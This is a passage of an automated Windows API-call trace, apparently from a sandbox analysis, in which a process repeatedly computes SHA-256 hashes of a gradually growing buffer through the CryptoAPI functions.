	[0250.468] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.468] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.469] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0250.469] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3c08
	[0250.469] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3c08, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3c08, pdwDataLen=0x128c3c) returned 1
	[0250.469] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.469] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.469] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.469] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.469] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0250.469] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3c30
	[0250.469] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3c30, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3c30, pdwDataLen=0x128c3c) returned 1
	[0250.469] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.469] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.469] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.469] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.470] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0250.470] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.470] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3c58
	[0250.470] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3c58, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3c58, pdwDataLen=0x128c3c) returned 1
	[0250.470] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.470] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.470] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.470] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.470] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0250.470] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.470] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3c80
	[0250.470] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3c80, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3c80, pdwDataLen=0x128c3c) returned 1
	[0250.470] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.470] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.470] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.470] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.471] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0250.471] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.471] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3ca8
	[0250.471] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3ca8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3ca8, pdwDataLen=0x128c3c) returned 1
	[0250.471] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.471] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.471] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.471] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.471] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0250.471] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.471] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3cd0
	[0250.471] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3cd0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3cd0, pdwDataLen=0x128c3c) returned 1
	[0250.471] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.471] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.471] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.471] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.472] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0250.472] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.472] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3cf8
	[0250.472] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3cf8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3cf8, pdwDataLen=0x128c3c) returned 1
	[0250.472] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.472] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.472] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.472] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.472] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0250.472] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.472] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3d20
	[0250.472] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3d20, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3d20, pdwDataLen=0x128c3c) returned 1
	[0250.472] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.472] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.472] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.472] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.473] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0250.473] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.473] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3d48
	[0250.473] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3d48, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3d48, pdwDataLen=0x128c3c) returned 1
	[0250.473] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.473] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.473] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.473] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.473] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0250.473] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.473] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3d70
	[0250.473] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3d70, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3d70, pdwDataLen=0x128c3c) returned 1
	[0250.473] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.473] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.473] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.473] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.474] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0250.474] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.474] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3d98
	[0250.474] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c3d98, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3d98, pdwDataLen=0x128c3c) returned 1
	[0250.474] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.474] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.474] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.475] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.475] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0250.475] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.475] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c3dc0
	[0250.475] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c3dc0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c3dc0, pdwDataLen=0x128c3c) returned 1
	[0250.475] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.476] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.476] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.476] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.476] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0250.476] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.476] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778988
	[0250.476] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x2778988, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2778988, pdwDataLen=0x128c3c) returned 1
	[0250.476] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.476] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.476] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.476] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.476] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0250.476] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.476] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777f60
	[0250.476] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x2777f60, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x2777f60, pdwDataLen=0x128c3c) returned 1
	[0250.477] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.477] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.477] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.477] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.477] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0250.477] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0508
	[0250.477] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0508, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0508, pdwDataLen=0x128c3c) returned 1
	[0250.477] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.477] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.477] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.477] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.477] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0250.477] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.477] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0620
	[0250.478] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c0620, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0620, pdwDataLen=0x128c3c) returned 1
	[0250.478] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.478] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.478] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.478] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.478] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0250.478] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.478] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bf680
	[0250.478] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27bf680, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27bf680, pdwDataLen=0x128c3c) returned 1
	[0250.478] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.478] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.478] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.478] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.478] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0250.478] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.479] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0828
	[0250.479] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c0828, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0828, pdwDataLen=0x128c3c) returned 1
	[0250.479] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.479] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.479] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.479] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.479] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0250.479] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.479] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0698
	[0250.479] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0698, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0698, pdwDataLen=0x128c3c) returned 1
	[0250.479] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.479] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.479] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.479] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.479] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0250.479] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.480] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0850
	[0250.480] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c0850, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0850, pdwDataLen=0x128c3c) returned 1
	[0250.480] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.480] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.480] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.480] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.480] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0250.480] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.480] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27bfa90
	[0250.480] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27bfa90, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27bfa90, pdwDataLen=0x128c3c) returned 1
	[0250.480] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.480] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.480] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.480] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.480] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0250.481] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.481] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c08c8
	[0250.481] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c08c8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c08c8, pdwDataLen=0x128c3c) returned 1
	[0250.481] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.481] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.481] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.481] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.481] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0250.481] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.481] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0260
	[0250.481] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0260, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0260, pdwDataLen=0x128c3c) returned 1
	[0250.481] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.481] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.481] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.481] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.481] CryptHashData (hHash=0x22b70c0, pbData=0x2761c48, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0250.482] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.482] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0788
	[0250.482] CryptGetHashParam (in: hHash=0x22b70c0, dwParam=0x2, pbData=0x27c0788, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0788, pdwDataLen=0x128c3c) returned 1
	[0250.482] CryptDestroyHash (hHash=0x22b70c0) returned 1
	[0250.482] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0250.482] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225d20) returned 1
	[0250.482] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0250.482] CryptHashData (hHash=0x22b6b80, pbData=0x2761c48, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0250.482] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0250.482] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0878
	[0250.482] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c0878, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c0878, pdwDataLen=0x128c3c) returned 1
	[0250.482] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0250.482] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
